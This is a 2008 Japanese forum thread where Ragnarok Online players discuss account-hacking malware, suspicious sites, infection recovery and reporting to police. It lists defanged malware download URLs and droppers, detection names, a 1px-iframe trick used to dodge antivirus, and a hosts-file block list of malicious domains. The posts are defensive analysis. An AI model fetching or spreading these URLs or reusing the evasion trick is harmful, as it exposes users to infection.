最寄にだけなんですよ。進展０のようだったら相談してみます

232 ：（○口○*）さん sage ： 2008/04/08(火) 00:26 ID:/K2eAViD0

とりあえず落ち着け
レス番が飛びすぎだ

233 ：（○口○*）さん sage ： 2008/04/08(火) 01:48 ID:Rp1f9Qg50

>>256と>>240に期待

234 ：（○口○*）さん ksk sage ： 2008/04/08(火) 02:41 ID:xMmuBuPf0

早め早めに動かないと、後回しにされて最終的に忘れられるってこともあるしな

235 ：（○口○*）さん sage ： 2008/04/08(火) 07:43 ID:J3t/v77J0

自動車サイト「carview.co.jp」、改竄によりウイルスを仕込まれる
http://internet.watch.impress.co.jp/cda/news/2008/04/07/19123.html

対象は、下記のようだが、既にサイトが存在しない模様。
ソースチェッカーオンラインのキャッシュから拾い出せたのはindex.htmまで。
それから呼びだされる先のファイルは入手に失敗。

ttp://www■414151■com/fjp■js
ttp://www■414151■com/index■htm
ttp://www■414151■com/Real■htm
ttp://www■414151■com/Bfyy■htm
ttp://www■414151■com/Lz■htm
ttp://www■414151■com/XunLei■htm

236 ：（○口○*）さん ： 2008/04/08(火) 18:07 ID:HdAEzERK0

緊急(5) 重要(3)
ttp://www.microsoft.com/japan/technet/security/bulletin/ms08-apr.mspx

237 ：（○口○*）さん sage ： 2008/04/09(水) 17:29 ID:CU4mCxWO0

【　 　 　 気付いた日時　 　 　 　 　 】4/9
【不審なアドレスのクリックの有無　】 RO全職業各型テンプレ Wiki* のモンクの欄に
Last-modified: 2008-02-03 (日) 12:45:55 　これを見た人は、七日以内に死にます。とあったので
【　　アドレス 　 】ttp://wikiwikiあjp/roalljob/?%A5%E2%A5%F3%A5%AFあ
【　 　　 OS　 　 】WindowsXP Home
【使用ブラウザ 】IE6.0
【WindowsUpdateの有無】 一か月ほど前
【　アンチウイルスソフト 】 NortonInternetSecurity2007
【その他のSecurty対策 】 なし
【 ウイルススキャン結果】 特になし
【テンプレの参考サイトを読んだか】 ＢＳＷＩＫＩはざっと読みました
【hosts変更】無
【PeerGuardian2導入】無
【説明】
あからさまに怪しかったので、「ＢＳ安全のために」でアドレスやプロパティ情報を検索にかけてみるも該当なし。
大丈夫かな、と思ったけれど、数日後（昨日）ＲＯを起動しようとすると
エラー:このページでエラーが発生しました
ライン:２
文字:１７９６４
エラー:documは宣言されていません
コード:０
ttp://wwwあragnarokonlineあjp/launch/
このスクリプトを実行し続けますか？　はい・いいえ
と出たので不安になりました。これはモンクは関係なく、ＲＯで通常の？トラブルが出ただけなんでしょうか？
一昨日起動したときはなにも出ませんでした。アカハックなんでしょうか？
普通に起動していいのかどうなのかご教示ください。物凄い質問スレではJavascriptがなんとかって
言われましたけど。

238 ：（○口○*）さん sage ： 2008/04/09(水) 17:32 ID:QA6ilHPl0

そこまでちゃんとしておいてなんで置換が「あ」なのか…
URLに関してはわからないけどパッチ告知のエラーは癌のミス

239 ：（○口○*）さん ： 2008/04/09(水) 18:52 ID:oL5FDXbHO

＞＞237
俺もそれと同じエラー出たけど、クッキーと一時ファイル消去したら出なくなったぜ

240 ：（○口○*）さん sage ： 2008/04/09(水) 18:53 ID:QMYIlgPh0

別にクッキーは消さないで良い

241 ：（○口○*）さん sage ： 2008/04/09(水) 18:57 ID:pp3rLKic0

スクリプトエラーは18:48付で修正されたな

242 ：（○口○*）さん ： 2008/04/09(水) 18:58 ID:oL5FDXbHO

ttp://www.ragnarokonline.jp/launch/は公式だぜ

243 ：（○口○*）さん sage ： 2008/04/09(水) 19:19 ID:KbHB3Vqx0

>公式だぜ

セキュリティソフトを売ってる会社のページが改ざんされる時代ですから。

244 ：（○口○*）さん sage ： 2008/04/09(水) 19:21 ID:QA6ilHPl0

パッチ告知がハックされてウイルス仕込まれたら大惨事だよな

245 ：（○口○*）さん sage ： 2008/04/09(水) 19:26 ID:CU4mCxWO0

アカハックとかじゃなかったんですね！よかった〜安心できました。
お答えありがとうございました。>>238置換はなんでもいいのかと思って、「あ」に
してしまいました。次からは■にします。すみません。

246 ：（○口○*）さん ： 2008/04/09(水) 23:34 ID:oL5FDXbHO

次がないことを祈る！

247 ：（○口○*）さん sage ： 2008/04/10(木) 18:08 ID:dSRAppSs0

カスペオンラインスキャンのフォントがなんかへんなんだが・・・

248 ：（○口○*）さん sage ： 2008/04/11(金) 23:04 ID:Iqt+IXbn0

ちょっと相談。下記のURL行ったらＰＧ２が弾いてて
ttp://www■amury■com/reading■html
リネトロイのリスト内の物らしいんだけど
ttp://www.aguse.jp/で見るとただの跡地ぽいんだよね。
これって危ないＵＲＬ？

249 ：（○口○*）さん sage ： 2008/04/11(金) 23:58 ID:Il078EVY0

>>1

250 ：（○口○*）さん ： 2008/04/12(土) 04:01 ID:Knaqw/kcO

っソースチェッカーオンライン

251 ：（○口○*）さん sage ： 2008/04/12(土) 14:45 ID:DqnwAWaA0

ソースチェッカーオンラインで
安全度とカーソル合わせた時の説明はわかるけど
ソースが安全かどうかはどうやって見ればいいかな？

252 ：（○口○*）さん sage ： 2008/04/12(土) 15:20 ID:lIkQtn+t0

>>251
それを自分で判断するんだ。危険なサイトの特徴があるかどうかを。

サイズ0のiframe読み込みがあって、カウンターとかじゃなく、なおかつ、既知の危険アドレスであるとか、
なにかのexeを読み込ませようとするものであるとか、既知のアカハック先と同じようなスクリプトあるとか、
Wikiのサイドメニューのリンク先が全部同じで、TOPページと別サイトであるとか、
アニメカーソルを読み込ませるようになっていて、そいつの中身が（以下省略

ある程度は読み取ったけど、ここがわからないとかなら、ここで質問しても歓迎される。
なにがわからないのかもわかりませんというなら、htmlの読み方から覚えてこいと放置される。

253 ：（○口○*）さん sage ： 2008/04/12(土) 15:27 ID:8fHJzLQl0

zipファイル落とさないでアクセスしただけなら大丈夫だよな・・・

254 ：（○口○*）さん sage ： 2008/04/12(土) 16:02 ID:grzDFqCA0

ここはアドレスじゃなくてもいいのでしょうか

【ファイル名】c:\windows\system32\optserve■exe
【 気づいた日時】昨日の２３時頃
【 ウイルススキャン結果】avast4,8（無料版）でマルウェアと診断

googleで検索したところ、なにやらよろしくない物のようで
判断を仰ぎたく貼らせていただきます

255 ：（○口○*）さん sage ： 2008/04/12(土) 16:08 ID:u/3vt/pV0

>>254
アンインストール方法
ttps://www■optmedia■jp/techinfo/detail/?did=0000005

256 ：（○口○*）さん sage ： 2008/04/12(土) 16:09 ID:DqnwAWaA0

>>252
なるほど。暇な時にでも勉強してみる・・

257 ：（○口○*）さん sage ： 2008/04/12(土) 16:34 ID:grzDFqCA0

>>255
ありがとうございます
調べたところ、キーボードレッスン６というものが入っていたらしく
それで広告等が表示されていたようです

キーボードレッスンをアンインストールし、おそらく元に戻ったと思われます
ありがとうございました

258 ：（○口○*）さん sage ： 2008/04/13(日) 00:18 ID:RUjVVhMn0

アカハックではないので、こちらで。spamメールにくっついてきたもの。
いずれも、リンクさせようとするのが、グーグル経由。
例)ttp://www■google■com/pagead/iclk?sa=l&ai=OsSboo&num=(数値)&adurl=該当アドレス

ttp://www■omshoponline■com/gallery■php
ttp://www■omshoponline■com/gallery■html
ttp://www■omshoponline■com/gg■html
ttp://www■omshoponline■com/mgp■exe

ttp://www■miles-stein■de/gallery■php
ttp://www■miles-stein■de/gallery■html
ttp://www■miles-stein■de/gg■html
ttp://www■miles-stein■de/mgp■exe

ttp://e-kasa■w8w■pl/video■exe
ttp://www■bambinidimanina■org/video■exe
ttp://gaan■co■kr/video■exe
ttp://www■sural-autoparts■com/video■exe
ttp://mitoltd■com■tr/video■exe
ttp://missonline■es/video■exe
ttp://westphoto■org/video■exe
ttp://normrestorasyon■com/video■exe
ttp://fernbedienung■ch/video■exe
ttp://robert■nogacki■9■w■interia■pl/video■exe
ttp://ricekorea■co■kr/video■exe
ttp://www■ccav■org■ar/video■exe
ttp://westphoto■org/video■exe

259 ：（○口○*）さん sage ： 2008/04/13(日) 00:19 ID:RUjVVhMn0

(続き)
video.exeは直接呼びだされ、gallery.phpは、
gallery.html->gg.html & mgp.exe の順に本体を呼びださせる。

アドレスは数日で使えなくなる様子。実体は全部同じもの。
gallery.html : NotDetected
gg.html : Trojan-Downloader.JS.Iframe.ey
mgp.exe : Trojan-Downloader.Win32.Exchanger.u
video.exe : Trojan-Downloader.Win32.Exchanger.r

gallery.htmlは、アカハックと同じようにiframeで他のページを呼び出すが、
サイズ0ではなく、style="width:1px; height:1px;" という書式になっていることで
セキュリティソフトの検出避けを試みている模様。回避手法の一例として紹介。

でも、呼びだされた先や本体は殆どのベンダーが対応済みなので、gallery.htmlが
すり抜けても実害はなさそう。

260 ：（○口○*）さん sage ： 2008/04/13(日) 02:38 ID:4Kyt02nW0

ttp://www■skywebsv■com/Blog/
を踏んでしまい知人が感染いたしました。

OSを入れなおしたのですが、データのバックアップは
感染時に接続していた外付けHDDにいたしました。

バックアップデータをCドライブに戻しても問題ないでしょうか？
また外付けHDDも初期化するべきでしょうか？

261 ：（○口○*）さん sage ： 2008/04/13(日) 02:43 ID:RUjVVhMn0

>バックアップデータをCドライブに戻しても問題ないでしょうか？
感染していないデータであれば、戻しても問題無い。
前提条件である、感染していないデータかどうかの判断ができない場合は、誰も安全性を保証できない。

まず大丈夫だとは思うが、現在しられているマルウェアの中には、リムーバブルディスクを含む、
稼動時に接続されているすべてのドライブのオートランに取り付いて、繋いだだけで自身を実行させようと
試みるものもいる。

よって、これも、安全性を保証できない。

踏んでしまった時点と現時点での中身が異なる可能性もあるが、誰か奇特な人が、検体を入手し、
検出名をはっきりさせた後なら、その検出名のマルウェアの挙動について検索し、理解し、
安全かどうかを判断する参考にすることができる。

結局のところ、全ては"自己責任"という４文字に集約される。

262 ：（○口○*）さん sage ： 2008/04/13(日) 02:58 ID:RUjVVhMn0

アカウントハック総合対策スレ9
ttp://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/592

報告のアドレスについては、総合スレで言及されている。
呼びだされるファイルについては、該当のvirusTotal結果を見るとこうなっている。
4/6「Trojan.Win32.Inject.amb」

4/8に検体提出した際にも「Trojan-PSW.Win32.OnLineGames.wmz／Trojan.Win32.Inject.amb」であった。
（k1.exeには２つのファイルが含まれており、検出名は２つ存在する）
現時点で捕獲してスキャンした結果の検出名も同じである。

仮に、踏んだのが4/6〜4/13 2:50頃の間であれば、上記の２つについての解説サイトを確認し、
感染するような挙動をとったかどうかを判断すればいいことになる。
そのものずばりがない場合は、亜種区別の部分を削って、類似するものの挙動を確認すべし。

263 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/04/13(日) 05:57 ID:Lv4p4/JW0

>>258-259
アカハックではない　と言う文章を読みすごし、
サイト名をaguse.jpやGoogle先生で名前検索していました。
video■exeの置き場所のトップページは
えろそうなページやらレンタルサーバーっぽい画面が出てきたりしちゃったりして、
当然と言えばなんですけど世界のドメインって色々あるんですね…。

>アドレスは数日で使えなくなる様子。実体は全部同じもの。
との事でしたが、その点がどうなるのか判らなかったので、
臨時用？にそれ用のリストを貼って見ました。

264 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/04/13(日) 05:58 ID:Lv4p4/JW0

以下>>258-259　で報告の臨時用

127.0.0.1 www■omshoponline■com
127.0.0.1 www■sural-autoparts■com
127.0.0.1 www■normrestorasyon■com
127.0.0.1 www■miles-stein■de
127.0.0.1 www■missonline■es
127.0.0.1 www■e-kasa■w8w■pl
127.0.0.1 www■robert■nogacki■9■w■interia■pl
127.0.0.1 www■bambinidimanina■org
127.0.0.1 www■westphoto■org
127.0.0.1 www■westphoto■org
127.0.0.1 www■ccav■org■ar
127.0.0.1 www■fernbedienung■ch
127.0.0.1 www■ricekorea■co■kr
127.0.0.1 www■gaan■co■kr
127.0.0.1 www■mitoltd■com■tr
127.0.0.1 omshoponline■com
127.0.0.1 sural-autoparts■com
127.0.0.1 normrestorasyon■com
127.0.0.1 miles-stein■de
127.0.0.1 missonline■es
127.0.0.1 e-kasa■w8w■pl
127.0.0.1 robert■nogacki■9■w■interia■pl
127.0.0.1 bambinidimanina■org
127.0.0.1 westphoto■org
127.0.0.1 westphoto■org
127.0.0.1 ccav■org■ar
127.0.0.1 fernbedienung■ch
127.0.0.1 ricekorea■co■kr
127.0.0.1 gaan■co■kr
127.0.0.1 mitoltd■com■tr

追加として必要との要望がありましたらホムペのほうにも追加しますが、
いかが致しましょうか？

265 ：（○口○*）さん sage ： 2008/04/13(日) 06:07 ID:BJ/ulIhw0

>>263
多分、↓で紹介されているドメイン・テイスティングを利用した手法だろう。
無料試用期間として設けられている5日間、Add Grace Period(AGP)を濫用し、費用を負担せずに次々とドメインを使い捨てる。
ttp://journal.mycom.co.jp/news/2008/01/31/011/

266 ：（○口○*）さん sage ： 2008/04/13(日) 09:40 ID:RUjVVhMn0

>>264
追加はしなくていいと思う。ただの手法紹介だし。入れた時には失効してるドメインを入れる価値ないし。
それでもブロックしたい人なら、ここ↓のブロックリストを自己責任で入れればよし。
http://www.malware.com.br/

267 ：（○口○*）さん sage ： 2008/04/13(日) 13:16 ID:RUjVVhMn0

>>260
書くの忘れてたが、相談なら、

■　>>4のテンプレ位埋めてこい
■ 知人本人つれてこい、代理は却下だ
■ >>6の通りにやっとけ

という訳で、出直してこいや〜〜〜〜〜〜〜

268 ：（○口○*）さん sage ： 2008/04/13(日) 19:50 ID:g6QRWntx0

垢ハックされたので、Cドライブをクリーンインストールしまして
DドライブにはROが入っていて、ROを起動するとタスクマネージャの
プロセスタブに今まで無かったRagexe.exeがあるのですが・・・
これってまだウイルスが取れていない可能性高いでしょうか？

ちなみにカスペをインストールして使用しています。
カスペ使っててウイルスにかかってないけど、Ragexe.exeのプロセスが見えてる人など
いましたら教えてください。

269 ：（○口○*）さん sage ： 2008/04/13(日) 19:59 ID:NxPGN54w0

リネージュ資料室より
ttp://lineage.paix.jp/guide/security/virus-site.html
2008年4月上旬、自動車総合サイトの「カービュー (carview.co.jp)」が
不正アクセスにより改竄され、ウィルスが埋め込まれました。
埋め込まれたのは fjp.js という名前のJavaScriptで、
オンラインゲームのアカウント情報を盗むウィルスのインストールを試みます。
カービューのお知らせではウィルス対策ソフトでのチェックを勧めていますが、
4月7日時点ではシマンテック、トレンドマイクロ、マカフィー、NOD32、avast!、 AVGの
いずれでも検出できませんでした。
心当たりの方は、カスペルスキーのオンラインスキャンの利用をお勧めします。

270 ：（○口○*）さん sage ： 2008/04/13(日) 20:49 ID:RUjVVhMn0

>>269
fjp.js でぐぐってみると、埋め込まれたサイトのアドレスは、ttp://www■414151■com/fjp.js で
DNSで名前解決できなくなっている。>>265の指摘する手法で使い捨てられたドメインかもしれない。

ソースチェッカーで履歴が残っていたので、辿ってみると、fjp.js->index.htmと呼びだされ、
index.htmからは、Ajax.htm／Ms06014.htm／Real.htm／Bfyy.htm／Lz.htm／XunLei.htm が呼びだされる。

リネージュ資料室の置き場更新情報を見ると、www■k5dionne■comや、www■infosueek■comなどと
呼びだすファイル構成が同じようだ。

Backdoor.Win32.Hupigon.dsx／Trojan-PSW.Win32.LdPinch.beo／Trojan.Win32.Inject.ama／Trojan-PSW.Win32.OnLineGames.wmz
などのファイルを呼びだす模様。これは検体提出済みで、カスペは既に対応している。
他社は…まぁ、それなりに対応してくれることでしょう。多分。

271 ：（○口○*）さん sage ： 2008/04/13(日) 21:46 ID:NxPGN54w0

ajax、bfyy、lz、qvod、pps、real、xunlei、yahooなどは
2117966と同じCuteQQで生成されるファイル群ですな。

272 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/04/14(月) 22:18 ID:+Ldcpn240

>>265-266
265さん、情報ありがとうございます。
でも今後その手法でやられると非常に厄介ですね…。
それに266さんの言われるように存在しないものを追加しても仕方ないですし、
と言いつつアカハック分とか危険なURLについては追加していたりします。

件の手法の無料5日間ドメインの利用って
BOTの使い捨て無料アカウントを連想してしまいました。

273 ：（○口○*）さん ： 2008/04/15(火) 03:29 ID:qjzIGEsnO

＞＞268

正常

274 ：268 sage ： 2008/04/15(火) 16:56 ID:sLf2lfBLO

回答ありがとうございます。
おかげで安心しました。

275 ：（○口○*）さん sage ： 2008/04/16(水) 01:11 ID:qa53opBv0

誘導されて、こちらのスレッドに、お金の関係で警察署まで行くのは
お金がきついので、最寄の交番でも大丈夫ですかね・・？
今、ガンホーに報告して、今日、警察に行くところなのですが・・・

276 ：（○口○*）さん sage ： 2008/04/16(水) 01:31 ID:EmZmtLo20

交番じゃ流石に手に余ると思う。
面倒でも警察署まで出向かないと。
このスレをCtrl＋Fで「警察」とでも検索すればいろいろ役に立つ情報があるかも。

277 ：（○口○*）さん sage ： 2008/04/16(水) 15:53 ID:YOb9tyEW0

誘導するにも質問に答えて、次からはこっちでしてくれよな的に誘導すりゃいいのに
なんでテンプレ貼り付けるだけを延々繰り返すゴミがいるんだろうな

278 ：（○口○*）さん sage ： 2008/04/16(水) 16:01 ID:Tp1mVwuT0

取り敢えず、こっちでコメントつけてあげようぜ。こっちでgdgd言ってるのもいい加減みっともない。

アカウントハック総合対策スレ9
ttp://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/596
｜596 (^ー^*)ノ〜さん sage 08/04/16 13:13 ID:Q6/4PDFF0
｜NOD32アンチウイルス体験版て期限切れたらまた入れなおして使ってもok？

だめ、絶対。NOD32以外のメーカーでも、体験版は、購入するだけの価値があるか判断する為のものです。
いいと思ったらちゃんと購入しましょう。購入する気がないなら、フリーのセキュリティソフトを使いましょう。

279 ：（○口○*）さん sage ： 2008/04/16(水) 16:08 ID:YOb9tyEW0

そもそも期日切れて再インストールしても、前の情報見て使えないんじゃなかったかね

280 ：（○口○*）さん sage ： 2008/04/16(水) 16:33 ID:pvDLZeBz0

日付のチェックが無くて何度でも入れれる物も中にはあるけど
普通は再インストール出来ない。
もしする場合はOS再インストール。

レジストリ戻すだのなんだので裏技的な事をすれば可能な場合もあるが
そこまでするなら買えと言いたいわな。
高いものじゃないし、必要品なんだし。

そしてNOD32がどうなってるか知らない。
規約的にも問題あるし、どうしてもタダでやりたいなら、別でフリーのを
使う方がいい。

281 ：（○口○*）さん sage ： 2008/04/16(水) 16:43 ID:Tp1mVwuT0

NOD32は体験版の使用登録したメールアドレスに一定期間有効なIDとパスが送られてくる。
捨てメールアドレスを用意すれば何回でもできるが、倫理的にやっちゃいけないだろう。

282 ：（○口○*）さん sage ： 2008/04/16(水) 18:34 ID:zCxM4OIb0

>>275
つーかまず警察に電話はいれたのか？
いきなり行っても意味ないぞ。
ガンホーに報告したならメール返事きたよね。
そのなかから、各県のハイテク犯罪担当課へのリンクが探せるよね。
まず電話して事情説明し、アポとってから行くものだよ。

それと、このスレはじめから目通してくださいな。

283 ：275 sage ： 2008/04/17(木) 00:18 ID:6jSVlbxb0

やばい・・・驚天動地の極みに達したからか、手順がとち狂いまくり・・
ガンホー：こちらで調べます。
俺：警察に相談、IDやらパスやら、全部教えて、いろいろ質問に答える
帰ってきて今、レスを読んで、早まったかと後悔してる

284 ：（○口○*）さん sage ： 2008/04/17(木) 04:03 ID:SydqF+ts0

＞総合スレ9-598
｜598 (^ー^*)ノ〜さん sage New! 08/04/17 01:31 ID:hlIIq9ty0
｜3分で糞レス返すなんてどんだけ暇なんだｗｗｗｗｗｗｗｗｗｗ
｜休日なら休め！　ニートなら仕事探せ！

貴様には１つ上の投稿で十分だ
｜597 (^ー^*)ノ〜さん sage 08/04/16 13:16 ID:jYvVWh+Q0
｜重要な情報が埋れてしまわないようにする為、一般的なセキュリティ
｜対策・相談・雑談はLiveROの雑談スレ(通称 セキュスレ)を利用して下さい。
｜
｜セキュリティ対策、質問・雑談スレ5
｜http://enif.mmobbs.com/test/read.cgi/livero/1205488101/

285 ：（○口○*）さん sage ： 2008/04/17(木) 04:08 ID:zalIr0NY0

無理にこっちでレスする必要もないんだぜ、ほっとけ

286 ：（○口○*）さん sage ： 2008/04/17(木) 05:51 ID:kLMXpPLA0

>>284
レス内容に対してきちんと返答できず煽り、特に人格叩きに走ってる時点で
自らの愚かさを認めて敗北宣言しているような物なので放置すりゃいいよ

>>283
警察といっても担当分野という物があるからな
上のレスにもあるように、ハイテク犯罪関係の部署に電話してから行かないと意味無いぞ
ちゃんと担当者の名前を聞いてメモってから行くようにな
様子を見ると肝心な時に慌ててしまうタイプに見えるので、最初から言いたい事をメモしておくのもあり

287 ：（○口○*）さん sage ： 2008/04/17(木) 12:05 ID:Iiib8bGQ0

Firefox2.0.0.14リリース
Criticalな脆弱性の修正1件

288 ：（○口○*）さん sage ： 2008/04/17(木) 12:13 ID:Iiib8bGQ0

ついでにSafari3.1.1リリース

289 ：（○口○*）さん ： 2008/04/17(木) 18:42 ID:KxmW42MJO

カスペルスキーにしたんですが、起動時ごとにカスペルスキーのプロセスavp.exe数が変わるんですが（2〜3個です）、仕様でしょうか？

290 ：（○口○*）さん sage ： 2008/04/17(木) 18:46 ID:SydqF+ts0

複数起動してるのは知ってるが、個数までは気にしたことなかったな。

スタートアップスキャンしてる間は１つ増えるとかじゃねーの？

291 ：（○口○*）さん sage ： 2008/04/17(木) 18:50 ID:KxmW42MJO

いや、それが3個の時は電源落とすまで3個で、2個のときは電源落とすまで2個のままです。

292 ：（○口○*）さん sage ： 2008/04/17(木) 22:26 ID:PiMANuEZ0

>>284-286
そのレスは煽ってオマイらのようなヤツが埋めてくれるのを
期待して書き込んでるんだから、あっちで書いとくれ

>>286
どこら辺が人格叩きなのか文盲な俺でも判る様に解説してくれ

レス内容に対しての返答　→暇な書き込みするなら休むか探せ

597に対してはきちんと返答しているぞ
内容に関してはスレにそぐわないのは重々判っているが

293 ：（○口○*）さん sage ： 2008/04/17(木) 22:37 ID:SydqF+ts0

>>292
総合スレのテンプレを読んで理解してくれ。お前さんの書き込みはスレ違いの荒らし行為にしかなっていない。
>284-286に対するコメントも筋違い。総合スレを荒らさないようにこちらに持ち込んでるんだよ。

ここまで言っても理解できないなら、まずは半年ROMっててくれ。

294 ：（○口○*）さん sage ： 2008/04/17(木) 22:39 ID:zalIr0NY0

真性様には何言っても無駄だーな

295 ：（○口○*）さん sage ： 2008/04/17(木) 23:13 ID:mglWSIeS0

>>289
ここに仕様かどうかが分かる人が居るわけ無い
サポートに聞け

296 ：（○口○*）さん sage ： 2008/04/17(木) 23:44 ID:KxmW42MJO

サポートに聞いたら仕様らしいです。そのときの状態で変化するそうです。失礼しました。

297 ：（○口○*）さん sage ： 2008/04/18(金) 02:22 ID:rTRGmZZ10

>>293
　>>286は煽った当事者のレスだな

>>293-294
＞まずは半年ROMっててくれ
＞真性様には何言っても無駄だーな

　 　　　 　　 　＿＿＿_　　　
　　　　　　 ／ ＼　　／＼　ｷﾘｯ
.　　　　　／　（ー） 　（ー）＼　　　　　　
　　　　／　　 ⌒（__人__）⌒ ＼　決まった……俺ｶｯｺｲｲ
　　　　|　　 　　　|r┬-|　　　　| 　　　　
　　　　 ＼　　　　 `ー'´　　 ／　　　　
　　　　ノ　　　　　　　　　　 　＼
　 ／´　　　　　　　　　　　　 　　ヽ 　 　 　 　 　 　 　
　|　　　　ｌ　　　　　　　　　　　　　　＼
　ヽ　　　 -一''''''"~~｀`'ー--､　　　-一'''''''ー-､. 　 　
　　ヽ ＿＿＿＿(⌒)(⌒)⌒)　)　　(⌒＿(⌒)⌒)⌒))

298 ：（○口○*）さん sage ： 2008/04/18(金) 15:09 ID:/dWDkG8M0

自分自身で努力しましたが、不安が拭いきれない為書き込ませて頂きます。

【気付いた日時】今朝
【不審なアドレスのクリックの有無】「フェンリル板」とググって2番目に出ていたので、クリックしてしまった。
【アドレス】jbbs■livedoor■jp/computer/39711/
【OS】WindowsXP Home SP2
【使用ブラウザ】IE6.0 sp2
【アンチウイルスソフト】avast4.8
【その他のSecurty対策 】Spybot S&D
【ウイルススキャン結果】カスペル・avast・spybot全てに異常なし
【テンプレの参考サイトを読んだか】Yes
【hosts変更】無
【PeerGuardian2導入】無
【説明】
開いた時に何かあったわけでもないのですが、謎の掲示板にしか思えず。
ソースチェッカーでチェックも行い、ざっと自身で確認したところ、
問題は見つからなかったのですが、「Ragnarok Fenrir板」とつけられているので
RO関係であるという点で非常に不安に。
宜しくお願いします。

299 ：（○口○*）さん sage ： 2008/04/18(金) 15:49 ID:U1MIeqMn0

>>298
フェンリル板はこっちだぞ
http://fenrir.rash.jp/fenrir/

ただ、そっちも普通のLivedoorのBBSで、怪しげなスクリプトも
【現時点では】見当たらないように思える。
【現時点で、見落としてなければ】無害ぽい。

管理人を自称する人の投稿も2/16〜18辺りで、なにかやろうとして
立ち上げたものの、放置されるようになった場所ではないかと思われる。

放置推奨。グーグルツールバーを入れてるなら、Ｆ５→投票の連続で、
正規のフェンリル板を検索上位になるようにするといいんじゃないかな。

300 ：（○口○*）さん sage ： 2008/04/18(金) 17:22 ID:/dWDkG8M0

>>299
お手数お掛けしてしまって、申し訳ないです。
フェンリル板の正式な場所は知っていたんですが、いつも検索で行く癖がありまして。
グーグルツールバーは入れてないんですが、投票機能があるのですね。
インストールして誤爆で踏まないように、対応したいとおもいます。
本当に有難うございました。

301 ：283 sage ： 2008/04/18(金) 18:21 ID:VQUbqa2a0

ログインしてみたところ、キャラクターの
ｚ及び、アイテムが無くなっていました

そして、当方のIDから持ち去ったと見られる
アイテムを露店に出している商人がいました
そのキャラクター名・露店の中身をSSにとってあります。

302 ：283 sage ： 2008/04/18(金) 18:25 ID:VQUbqa2a0

上が質問内容で、それに対して、ガンホーから

ご報告いただいた情報を元に調査を行った結果、お客様のご報告内容と一致しない、
アトラクションIDの使用形跡を確認致しました。

つきましては、お客様のアトラクションIDの使用状況について
いま一度、以下の点についてもご確認ください。
　・家族や友人とのID共有や貸与
　・ネットカフェやご友人宅でのゲームをプレイ
　・不正ツールの使用
〜〜云々と色々続いて、最期にそれでも第3者による理由と思われる場合は
警察にご相談くださいと返事が返ってきました。
これは、垢ハックと認定されなかったということですよね？
どなたか、この状況になったことはありますか？

303 ：283 sage ： 2008/04/18(金) 18:26 ID:VQUbqa2a0

ウイルスを削除しようとして、起動に必要なファイルも消してしまったらしく
返事をすぐにすることができません・・・　どうか、そこはご容赦ください。
連投失礼

304 ：（○口○*）さん sage ： 2008/04/18(金) 18:33 ID:U1MIeqMn0

>>302
｜・ アカウントハッキングについて（ガンホー公式）
｜　 http://www.ragnarokonline.jp/playguide/hacking/

ガンホーに動いて貰う為には、必ず、警察に相談しなければなりません。

305 ：283 sage ： 2008/04/18(金) 18:37 ID:VQUbqa2a0

うーん・・・　一応、警察には相談したのですが、ガンホー曰く
まだ、何も捜査協力依頼が来ていないらしいので、ここは警察の担当者
にもう一度、話してみるしかないですかね？

ガンホーが垢ハックと認定、でも手が出せません　じゃあ、警察が
という流れだと思っていたのに・・・

306 ：283 sage ： 2008/04/18(金) 18:39 ID:VQUbqa2a0

ご報告いただいた情報を元に調査を行った結果、お客様のご報告内容と一致しない、
アトラクションIDの使用形跡を確認致しました。

この一文から、結局どうだったのか、読み取れない・・
これについても、お願いします。

307 ：（○口○*）さん sage ： 2008/04/18(金) 18:41 ID:C6nykswW0

書いてあるとおりじゃないの？

308 ：（○口○*）さん sage ： 2008/04/18(金) 18:42 ID:eu74ICHa0

何をどうお願いしますなんだ…

309 ：（○口○*）さん sage ： 2008/04/18(金) 18:42 ID:nnox/brF0

読んだとおりの内容なのに理解できんのか

310 ：283 sage ： 2008/04/18(金) 18:47 ID:VQUbqa2a0

報告内容と一致しない　垢ハックではないと認定されたのなら
警察にお願いしても無理かなあと・・・

それで、同じような状況の人がいないかと・・・

311 ：（○口○*）さん sage ： 2008/04/18(金) 18:53 ID:Q1I/bGgQ0

日本語でおｋ
＞お客様のご報告内容と一致しない、アトラクションIDの使用形跡を確認致しました。
お前がこのときとこのときとこのときに繋いだって言ったののほかに、誰かが接続してたって言ってんだよ
だから警察行って犯罪だと認められてから出直してねって話

312 ：283 sage ： 2008/04/18(金) 18:55 ID:VQUbqa2a0

>>311氏　ありがとう！！　やっと、理解できた！
そして、次にくるときは日本語で書き込んできます。

313 ：（○口○*）さん sage ： 2008/04/18(金) 19:02 ID:tAdJKcKK0

動転してるからちゃんと理解出来てないんじゃないのか？
報告内容と一致しない仕様形跡を確認したってことは、
283以外の誰かが283のID使ってROに入ったってことだよ。

ｶﾞﾝﾎｰから言われてるこれについて、283の思い当たることはないの？
　・家族や友人とのID共有や貸与
　・ネットカフェやご友人宅でのゲームをプレイ
　・不正ツールの使用

これのどれでもないなら警察で相談しろってことです。

ここまでかいてリロードしたら311さんが分かりやすく説明してくれたぜ。
消すのめんどいから送信(ﾟ∀ﾟ)

あと、アカハックで気が回ってないだろうけど、まずはｵﾁﾂｹ。
落ち着いてセキュスレ1から読んで、過去スレも読んで、日本語でおｋしろ。
動転すると二次被害だのなんだのあるからな。

314 ：（○口○*）さん sage ： 2008/04/18(金) 21:26 ID:/FIxJq7e0

http://internet.watch.impress.co.jp/cda/news/2008/04/18/19291.html
＞具体的には、カード決済で使う本人認証システム「3Dセキュア」を導入しているガンホーなどのゲームサイトで、
＞抽出したクレジットカード番号と、サウンドハウスのサイトのパスワードをマッチングさせて本人認証を通過。
＞その後、金券や商品を購入してRMT（Real Money Trade）などのサイトで転売するなど、足が付かないかたちで換金していたとしている。

315 ：（○口○*）さん sage ： 2008/04/19(土) 12:36 ID:AkQgmSCQ0

【　 　 　 気付いた日時　 　 　 　 　 】 2008/04/14
【不審なアドレスのクリックの有無　】 RO関連の掲示板、RO関連ブログ数件のどこかでJ-WORDのようなPOPup出た記憶アリ
【　　アドレス 　 】どれか不明
【　 　　 OS　 　 】WindowsXP Home SP1
【使用ブラウザ 】IE6.0 sp1
【WindowsUpdateの有無】 2年ぐらい前？
【　アンチウイルスソフト 】 なし
【その他のSecurty対策 】 ルータ有
【 ウイルススキャン結果】 Ad-aware2008で未検出
【テンプレの参考サイトを読んだか】 Yes
